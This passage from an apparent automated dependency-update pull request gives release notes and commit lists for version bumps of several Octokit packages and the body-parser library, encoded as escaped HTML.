(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `body-parser` from 1.19.0 to 1.20.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.20.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThe reason for this release is a fix to the extended urlencoded parser returning objects instead of arrays for large array inputs (\u0026gt; 100) on qs@6.14.2+. (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/692\"\u003eexpressjs/body-parser#692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct off-by-one error in parameterCount by \u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps(qs): bump qs to 6.15.1 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/722\"\u003eexpressjs/body-parser#722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.5 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/721\"\u003eexpressjs/body-parser#721\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSpecial thanks to triager \u003ca href=\"https://github.com/krzysdz\"\u003e\u003ccode\u003e@​krzysdz\u003c/code\u003e\u003c/a\u003e for keeping this on our radar and effectively triaging the specific issue!\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca 